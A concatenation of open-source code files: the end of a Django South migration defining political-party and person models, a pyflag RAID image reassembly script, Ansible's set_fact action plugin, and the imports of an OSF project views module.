db.send_create_signal('core', ['Persona'])
def backwards(self, orm):
# Deleting model 'Distrito'
db.delete_table('core_distrito')
# Deleting model 'Partido'
db.delete_table('core_partido')
# Deleting model 'Bloque'
db.delete_table('core_bloque')
# Deleting model 'Persona'
db.delete_table('core_persona')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.bloque': {
'Meta': {'object_name': 'Bloque'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.distrito': {
'Meta': {'object_name': 'Distrito'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.partido': {
'Meta': {'object_name': 'Partido'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.persona': {
'Meta': {'object_name': 'Persona'},
'apellido': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'documento_numero': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'documento_tipo': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'foto': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['core']
| agpl-3.0 | -2,885,843,716,758,494,700 | 78.005 | 182 | 0.578508 | false |
py4n6/pyflag | utilities/raid_test.py | 7 | 1982 | # This is a good example of how the sk.c stuff can be integrated into
# the raid stuff to be able to verify the image without unpacking the
# whole thing.
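# A hypothetical invocation, for orientation only (image names, map file and
# geometry below are made up; the real options are defined by optparse below):
#
#   python raid_test.py -m raid6.map -p 6 -n 6 -b 512 -s 0 -o output.dd \
#       disk0.dd disk1.dd disk2.dd disk3.dd disk4.dd None
#
# Passing the literal string "None" for a missing member appears to make the
# script substitute a ParityDisk built from the remaining images (see the loop
# over args below).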
import mapper
import optparse,sys
import sk
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option('-p','--period',default=6, type='int',
help = "periodicity of the map")
parser.add_option('-m','--map',default=None,
help = "The Map file itself")
parser.add_option('-s','--skip',default='0',
help = "length of data to skip in each disk")
parser.add_option('-n','--number',default=6, type='int',
help = "Number of disks")
parser.add_option('-b','--blocksize',default="512",
help = "block size")
parser.add_option('-P','--print_map',default=False, action='store_true',
help = "print the map")
parser.add_option('-o','--output', default="output.dd",
help = "Name of the output file")
parser.add_option("-S", "--subsys",
default=None,
help="Subsystem to use (e.g. EWF)")
(options, args) = parser.parse_args()
raid_map = mapper.load_map_file(options.map, options.period)
if options.print_map:
mapper.pretty_print(raid_map, options.period, options.number)
print mapper.calculate_map(raid_map, options.period, options.number)
sys.exit(0)
blocksize = mapper.parse_offsets(options.blocksize)
fds=[]
for arg in args:
if arg != "None":
fds.append(mapper.open_image(arg, options.subsys))
else:
fds.append(mapper.ParityDisk([mapper.open_image(arg) for arg in args if arg != 'None']))
fd = mapper.RaidReassembler(raid_map, fds, blocksize, skip=mapper.parse_offsets(options.skip))
skfs = sk.skfs(fd, imgoff = 128 * 1024 + 512 * 63)
print skfs.listdir("/")
| gpl-2.0 | 1,880,320,108,587,510,800 | 33.77193 | 100 | 0.577699 | false |
muravjov/ansible | v2/ansible/plugins/action/set_fact.py | 15 | 1402 | # Copyright 2013 Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.template import Templar
from ansible.utils.boolean import boolean
class ActionModule(ActionBase):
TRANSFERS_FILES = False
def run(self, tmp=None, task_vars=dict()):
templar = Templar(loader=self._loader, variables=task_vars)
facts = dict()
if self._task.args:
for (k, v) in self._task.args.iteritems():
k = templar.template(k)
if isinstance(v, basestring) and v.lower() in ('true', 'false', 'yes', 'no'):
v = boolean(v)
facts[k] = v
return dict(changed=True, ansible_facts=facts)
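# Editor's sketch (not part of the Ansible source): a playbook task using this
# action plugin might look like the YAML below; the variable names and values
# are invented. Strings that look boolean ('true'/'false'/'yes'/'no') are
# coerced by boolean() in run() above.
#
#   - set_fact:
#       service_port: 8080
#       use_tls: "yes"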
| gpl-3.0 | 6,678,922,070,172,358,000 | 37.944444 | 93 | 0.689016 | false |
efiring/UTide | utide/utilities.py | 1 | 8730 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import numpy as np
from scipy.io import loadmat
# This module is an excerpt from the one in python-gsw.
# Based on Robert Kern's Bunch; taken from
# http://currents.soest.hawaii.edu/hgstage/pycurrents/
# pycurrents/system/utilities.py
class Bunch(dict):
"""
A dictionary that also provides access via attributes.
Additional methods update_values and update_None provide
control over whether new keys are added to the dictionary
when updating, and whether an attempt to add a new key is
ignored or raises a KeyError.
The Bunch also prints differently than a normal
dictionary, using str() instead of repr() for its
keys and values, and in key-sorted order. The printing
format can be customized by subclassing with a different
    str_fmt class attribute. Do not assign directly to this
class attribute, because that would substitute an instance
attribute which would then become part of the Bunch, and
would be reported as such by the keys() method.
To output a string representation with
a particular format, without subclassing, use the
formatted() method.
"""
str_fmt = "{0!s:<{klen}} : {1!s:>{vlen}}\n"
def __init__(self, *args, **kwargs):
"""
*args* can be dictionaries, bunches, or sequences of
key,value tuples. *kwargs* can be used to initialize
or add key, value pairs.
"""
dict.__init__(self)
self.__dict__ = self
for arg in args:
self.update(arg)
self.update(kwargs)
def __str__(self):
return self.formatted()
def formatted(self, fmt=None, types=False):
"""
Return a string with keys and/or values or types.
*fmt* is a format string as used in the str.format() method.
The str.format() method is called with key, value as positional
arguments, and klen, vlen as kwargs. The latter are the maxima
of the string lengths for the keys and values, respectively,
up to respective maxima of 20 and 40.
"""
if fmt is None:
fmt = self.str_fmt
items = list(self.items())
items.sort()
klens = []
vlens = []
for i, (k, v) in enumerate(items):
lenk = len(str(k))
if types:
v = type(v).__name__
lenv = len(str(v))
items[i] = (k, v)
klens.append(lenk)
vlens.append(lenv)
klen = min(20, max(klens))
vlen = min(40, max(vlens))
slist = [fmt.format(key, value, klen=klen, vlen=vlen) for
key, value in items]
return ''.join(slist)
def from_pyfile(self, filename):
"""
Read in variables from a python code file.
"""
# We can't simply exec the code directly, because in
# Python 3 the scoping for list comprehensions would
# lead to a NameError. Wrapping the code in a function
# fixes this.
d = dict()
lines = ["def _temp_func():\n"]
with open(filename) as f:
lines.extend([" " + line for line in f])
lines.extend(["\n return(locals())\n",
"_temp_out = _temp_func()\n",
"del(_temp_func)\n"])
codetext = "".join(lines)
code = compile(codetext, filename, 'exec')
exec(code, globals(), d)
self.update(d["_temp_out"])
return self
def update_values(self, *args, **kw):
"""
arguments are dictionary-like; if present, they act as
additional sources of kwargs, with the actual kwargs
taking precedence.
One reserved optional kwarg is "strict". If present and
True, then any attempt to update with keys that are not
already in the Bunch instance will raise a KeyError.
"""
strict = kw.pop("strict", False)
newkw = dict()
for d in args:
newkw.update(d)
newkw.update(kw)
self._check_strict(strict, newkw)
dsub = dict([(k, v) for (k, v) in newkw.items() if k in self])
self.update(dsub)
def update_None(self, *args, **kw):
"""
Similar to update_values, except that an existing value
will be updated only if it is None.
"""
strict = kw.pop("strict", False)
newkw = dict()
for d in args:
newkw.update(d)
newkw.update(kw)
self._check_strict(strict, newkw)
dsub = dict([(k, v) for (k, v) in newkw.items()
if k in self and self[k] is None])
self.update(dsub)
def _check_strict(self, strict, kw):
if strict:
bad = set(kw.keys()) - set(self.keys())
if bad:
bk = list(bad)
bk.sort()
ek = list(self.keys())
ek.sort()
raise KeyError(
"Update keys %s don't match existing keys %s" % (bk, ek))
# The following functions ending with loadbunch() and showmatbunch()
# are taken from the repo
# http://currents.soest.hawaii.edu/hgstage/pycurrents/,
# pycurrents/file/matfile.py.
def _crunch(arr, masked=True):
"""
Handle all arrays that are not Matlab structures.
"""
if arr.size == 1:
arr = arr.item() # Returns the contents.
return arr
# The following squeeze is discarding some information;
# we might want to make it optional.
arr = arr.squeeze()
if masked and arr.dtype.kind == 'f': # Check for complex also.
arrm = np.ma.masked_invalid(arr)
if arrm.count() < arrm.size:
arr = arrm
else:
arr = np.array(arr) # Copy to force a read.
else:
arr = np.array(arr)
return arr
def _structured_to_bunch(arr, masked=True):
"""
Recursively move through the structure tree, creating
a Bunch for each structure. When a non-structure is
    encountered, process it with _crunch().
"""
# A single "void" object comes from a Matlab structure.
# Each Matlab structure field corresponds to a field in
# a numpy structured dtype.
if arr.dtype.kind == 'V' and arr.shape == (1, 1):
b = Bunch()
x = arr[0, 0]
for name in x.dtype.names:
b[name] = _structured_to_bunch(x[name], masked=masked)
return b
return _crunch(arr, masked=masked)
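# Editor's note: a (1, 1) structured ("void") array is what loadmat produces for
# a MATLAB struct, e.g. (hypothetical field names):
#   x = np.zeros((1, 1), dtype=[('lat', 'f8'), ('lon', 'f8')])
#   _structured_to_bunch(x)   # -> Bunch with scalar fields 'lat' and 'lon'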
def _showmatbunch(b, elements=None, origin=None):
if elements is None:
elements = []
if origin is None:
origin = ''
items = list(b.items())
for k, v in items:
_origin = "%s.%s" % (origin, k)
if isinstance(v, Bunch):
_showmatbunch(v, elements, _origin)
else:
if isinstance(v, str):
slen = len(v)
if slen < 50:
entry = v
else:
entry = 'string, %d characters' % slen
elif isinstance(v, np.ndarray):
if np.ma.isMA(v):
entry = 'masked array, shape %s, dtype %s' % (v.shape, v.dtype)
else:
entry = 'ndarray, shape %s, dtype %s' % (v.shape, v.dtype)
else:
entry = '%s %s' % (type(v).__name__, v)
elements.append((_origin, entry))
elements.sort()
return elements
def showmatbunch(b):
"""
Show the contents of a matfile as it has been, or would be, loaded
by loadbunch.
*b* can be either the name of a matfile or the output of loadbunch.
Returns a multi-line string suitable for printing.
"""
if isinstance(b, str):
b = loadbunch(b)
elist = _showmatbunch(b)
names = [n for n, v in elist]
namelen = min(40, max([len(n) for n in names]))
str_fmt = "{0!s:<{namelen}} : {1!s}\n"
strlist = [str_fmt.format(n[1:], v, namelen=namelen) for (n, v) in elist]
return ''.join(strlist)
def loadbunch(fname, masked=True):
"""
Wrapper for loadmat that dereferences (1,1) object arrays,
converts floating point arrays to masked arrays, and uses
nested Bunch objects in place of the matlab structures.
"""
out = Bunch()
if fname.endswith('.mat'):
with open(fname, 'rb') as fobj:
xx = loadmat(fobj)
elif fname.endswith('.npz'):
xx = np.load(fname, encoding='latin1')
else:
raise ValueError('Unrecognized file {}'.format(fname))
keys = [k for k in xx.keys() if not k.startswith("__")]
for k in keys:
out[k] = _structured_to_bunch(xx[k], masked=masked)
return out
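# Editor's sketch of typical use (the file name is hypothetical):
#   b = loadbunch('harmonics.mat')   # nested Bunch; float arrays containing
#                                    # NaN/inf come back as masked arrays
#   print(showmatbunch(b))           # one line per leaf element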
| mit | -8,632,641,698,840,548,000 | 31.574627 | 83 | 0.568614 | false |
DrkVenom/roots | roots.py | 1 | 9713 | #Name: Tony Ranieri
#Created: October 2014
#Modified: August 2015
import numpy as np
import pylab as py
import matplotlib.pyplot as plt
def roots(f,df,a,b,niter,epsilon):
# Input
# f: the function that we need to find roots for
# df: derivative of the function f
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# perform bisect
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
if (fa*fb>0): #test to see if there is a single root in the bracket
print "There are either no roots in this bracket, or an even number of them. Please refine your bracket."
return 1
for i in range(niter):
xstar=(a+b)/2 #define xstar as the midpoint of the current bracket
fxstar=f(xstar) #set the value of our function at this new midpoint
err=abs(b-a)
if (fa*fxstar<0): #test to see if root is in [fa,fxstar]
b=xstar #if yes, set our upper bound to now be xstar
fb=fxstar #update the guess and iterate
elif (fb*fxstar<0): #test to see if root is in [fxstar,fb]
a=xstar #if yes, set our lower bound to now be xstar
fa=fxstar #update the guess and iterate
else:
a=xstar
b=xstar
print "Check the results carefully! One of your endpoints may be a root or 0 might be a root."
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level
break #if it is, we're done here
xstar_b=xstar
fxstar_b=f(xstar_b)
# perform Newton
x0=(a+b)/2 #need an initial guess, midpoint seems decent enough
fx0=f(x0) #define y-coord at x0 based on the given f
for i in range(niter):
dfx0=df(x0) #define derivative y-coord at x0 based on the given df
if (dfx0==0):
break
xstar=x0-fx0/dfx0 #set xstar as defined by Newton's method
err=abs(xstar-x0)
fxstar=f(xstar)
        if (err<epsilon):               #test to see if our proposed root is "close enough" based on our tolerance level
            break                       #if it is, we're done here
        x0=xstar                        #otherwise update the guess and iterate
        fx0=fxstar
xstar_n=xstar
fxstar_n=f(xstar_n)
# perform Secant
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
for i in range(niter):
if (fb==fa):
break
xstar=b-((fb*(b-a))/(fb-fa)) #set xstar as defined by secant method
err=abs(f(xstar))
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
a=b #update the initial guess and iterate
b=xstar #update the initial guess and iterate
fa=fb
fb=fxstar
if (i==niter) or (fb==fa):
break
xstar_s=xstar
fxstar_s=f(xstar_s)
#find best estimate for root by testing proximity to zero
if (abs(fxstar_b-0)<=abs(fxstar_n-0)):
if (abs(fxstar_b-0)==abs(fxstar_n-0)):
xstar=xstar_b
print "Bisect method and Newton method came to the same conclusion."
else:
if (abs(fxstar_b-0)<=abs(fxstar_s-0)):
if (abs(fxstar_b-0)==abs(fxstar_s-0)):
xstar=xstar_b
print "Bisect method and Secant method came to the same conclusion."
else:
xstar=xstar_b
print "Bisect method is superior."
else:
xstar=xstar_s
print "Secant method is superior."
else:
if (abs(fxstar_n-0)<=abs(fxstar_s-0)):
if (abs(fxstar_n-0)==abs(fxstar_s-0)):
xstar=xstar_n
print "Newton method and Secant method came to the same conclusion."
else:
xstar=xstar_n
print "Newton method is superior."
else:
xstar=xstar_s
print "Secant method is superior."
#plot function with identified root
#x=np.linspace(a, b, 200)
#plt.plot(x, f(x))
#plt.xlim(a-1, b+1)
#plt.xticks(np.linspace(a, b, 10, endpoint=True))
#plt.xlim(x.min()*1.1,x.max() * 1.1)
#plt.ylim(-5, 5)
#ax = plt.gca()
#ax.axes.get_yaxis().set_visible(False)
#ax.spines['right'].set_color('none')
#ax.spines['top'].set_color('none')
#ax.spines['left'].set_color('none')
#ax.xaxis.set_ticks_position('bottom')
# ax.spines['bottom'].set_position(('data',0))
#plt.show()
print "output = (value, bisect, newton, secant)"
return xstar, xstar_b, xstar_n, xstar_s
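# --- Illustrative usage (added sketch; not part of the original module) ---
# A hedged example of calling roots() on a simple polynomial. The test
# function, its derivative, the bracket [0.0, 2.0] and the tolerances are
# made-up values; the bracket is chosen so that it contains the root sqrt(2).
def _roots_example():
    f = lambda x: x**2 - 2.0       # single root at sqrt(2) ~ 1.4142 inside [0, 2]
    df = lambda x: 2.0*x
    return roots(f, df, 0.0, 2.0, 100, 1e-8)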
def bisect(f,a,b,niter,epsilon):
# Input
# f: the function that we need to find roots for
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
xseq=np.zeros(niter)
if (fa*fb>0): #test to see if there is a single root in the bracket
print "There are either no roots in this bracket, or an even number of them. Please refine your bracket."
return 1
for i in range(niter):
xstar=(a+b)/2 #define xstar as the midpoint of the current bracket
xseq[i]=xstar #add the value of xstar to this convergent sequence
fxstar=f(xstar) #set the value of our function at this new midpoint
err=abs(b-a)
if (fa*fxstar<0): #test to see if root is in [fa,fxstar]
b=xstar #if yes, set our upper bound to now be xstar
fb=fxstar #update the guess and iterate
elif (fb*fxstar<0): #test to see if root is in [fxstar,fb]
a=xstar #if yes, set our lower bound to now be xstar
fa=fxstar #update the guess and iterate
else:
a=xstar
b=xstar
print "Check the results carefully! One of your endpoints may be a root."
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level
break #if it is, we're done here
xstar=(a+b)/2
fxstar=f(xstar)
return xstar, err, fxstar, i+1, xseq[0:i]
def newton(f,df,x0,niter,epsilon):
# Input
# f: the function that we need to find roots for
# df: the derivative of the function f
# x0: initial guess for a root
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fx0=f(x0) #define y-coord at x0 based on the given f
xseq=np.zeros(niter+1) #need +1 as we already know the first entry is x0
xseq[0]=x0
for i in range(niter):
dfx0=df(x0) #define derivative y-coord at x0 based on the given df
xstar=x0-fx0/dfx0 #set xstar as defined by Newton's method
xseq[i+1]=xstar
err=abs(xstar-x0)
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
x0=xstar #update the initial guess and iterate
fx0=fxstar
if (i==niter-1):
print "Newton's method failed to converge given the number of iterations."
break
return xstar, err, fxstar, i+1, xseq[0:(i+2)]
def secant(f,a,b,niter,epsilon):
# Input
# f: the function of interest
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
xseq=np.zeros(niter+2) #need +2 as the first two entries are the initial points a and b
xseq[0]=a
xseq[1]=b
for i in range(niter):
xstar=b-((fb*(b-a))/(fb-fa)) #set xstar as defined by secant method
xseq[i+2]=xstar #+2 as we already defined the first 2 entries
err=abs(f(xstar))
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
a=b #update the initial guess and iterate
b=xstar #update the initial guess and iterate
fa=fb
fb=fxstar
if (i==niter-1):
print "Secant's method failed to converge given the number of iterations."
break
return xstar, err, fxstar, i+1, xseq[0:(i+3)]
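# --- Illustrative comparison (added sketch; not part of the original module) ---
# A hedged example that runs the three stand-alone solvers on the same
# made-up function and reports the iteration counts. Python 2 print
# statements are used to stay consistent with the rest of this module.
def _compare_solvers():
    f = lambda x: np.cos(x) - x        # single root near x ~ 0.739
    df = lambda x: -np.sin(x) - 1.0
    results = [('bisect', bisect(f, 0.0, 1.0, 100, 1e-8)),
               ('newton', newton(f, df, 0.5, 100, 1e-8)),
               ('secant', secant(f, 0.0, 1.0, 100, 1e-8))]
    for name, (xstar, err, fxstar, iters, xseq) in results:
        print name, xstar, iters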
| gpl-2.0 | 3,397,281,621,320,606,700 | 40.15678 | 121 | 0.607536 | false |
happyemi/friendlypi | serverpi/src/plugins/test.py | 1 | 1122 | # Copyright 2013-2014 Emiliano Mennucci
#
# This file is part of FriendlyPi.
#
# FriendlyPi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FriendlyPi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FriendlyPi. If not, see <http://www.gnu.org/licenses/>.
class TestMod:
def __init__(self, config):
self.value = 0
def get_status(self):
actions = [{"id": "inc", "label": "Increment"}, {"id": "dec", "label": "Decrement"}]
return {"caption": "Test module", "status": str(self.value), "actions": actions }
def exec_command(self, command):
if command == "inc":
self.value += 1
else:
self.value -= 1
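# --- Illustrative usage (added sketch; not part of the original plugin) ---
# A minimal example of how the FriendlyPi server might drive this plugin.
# The empty config dict and the command names come from the class above;
# running the module directly like this is purely hypothetical.
if __name__ == '__main__':
    mod = TestMod({})              # this plugin ignores its config
    mod.exec_command('inc')        # value -> 1
    mod.exec_command('dec')        # value -> 0
    print(mod.get_status())        # caption, status string and actions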
| gpl-3.0 | -7,523,172,867,304,118,000 | 35.193548 | 86 | 0.675579 | false |
FranzSchubert92/cw | python/game_of_stones.py | 1 | 2265 | """
Two players (numbered 1 and 2) are playing a game with n stones. Player 1
always plays first, and the two players move in alternating turns. The game's
rules are as follows:
In a single move, a player can remove 2, 3, or 5 stones from the game board.
If a player is unable to make a move, that player loses the game.
Given the number of stones, find and print the name of the winner on a new line.
Each player plays optimally, meaning they will not make a move that causes them
to lose the game if some better, winning move exists.
Input Format
The first line contains an integer, T, denoting the number of test cases.
Each of the subsequent lines contains a single integer n denoting the number
of stones in a test case.
Output Format
On a new line for each test case, print 'First' if the first player wins;
otherwise, print 'Second'.
# doctests
>>> play(1)
'Second'
>>> play(2)
'First'
>>> play(3)
'First'
>>> play(4)
'First'
>>> play(5)
'First'
>>> play(6)
'First'
>>> play(7)
'Second'
>>> play(8)
'Second'
>>> play(10)
'First'
Explanation
In the sample, we have 8 test cases.
We'll refer to our two players as Player 1 and Player 2.
If n = 1, Player 1 can't make any moves and loses the game (i.e., Player 2
wins and we print 'Second' on a new line).
If n = 2, Player 1 removes 2 stones in their first move and wins the game, so
we print 'First' on a new line.
If n = 3, Player 1 removes 2 stones in their first move, leaving 1 stone on
the board. Because Player 2 is left with no available moves, Player 1 wins and
we print 'First' on a new line.
If n = 4, Player 1 removes 3 stones in their first move, leaving 1 stone on
the board. Because Player 2 has no available moves, Player 1 wins and we print
'First' on a new line.
"""
def play(stones):
# "moves" is a map from number of stones to whether player1 will win;
# player1 always goes first;
moves = {0:False, 1:False, 2:True, 3:True, 4:True, 5:True, 6:True, 7:False}
x = max(moves.keys())
while x < stones:
x += 1
if moves[x-2] == moves[x-3] == moves[x-5]:
moves[x] = not moves[x-2]
elif not moves[x-5] or not moves[x-3] or not moves[x-2]:
moves[x] = True
return "First" if moves[stones] else "Second"
if __name__ == "__main__":
import doctest
doctest.testmod()
T = int(input())
while T:
num_stones = int(input())
print(play(num_stones))
T -= 1
| bsd-3-clause | 7,715,425,145,268,505,000 | 24.166667 | 81 | 0.664459 | false |
adlius/osf.io | website/project/views/node.py | 1 | 51221 | # -*- coding: utf-8 -*-
import os
import logging
from rest_framework import status as http_status
import math
from collections import defaultdict
from flask import request
from django.apps import apps
from django.utils import timezone
from django.core.exceptions import ValidationError
from django.db.models import Q, OuterRef, Subquery
from framework import status
from framework.utils import iso8601format
from framework.flask import redirect # VOL-aware redirect
from framework.auth.decorators import must_be_logged_in, collect_auth
from website.ember_osf_web.decorators import ember_flag_is_active
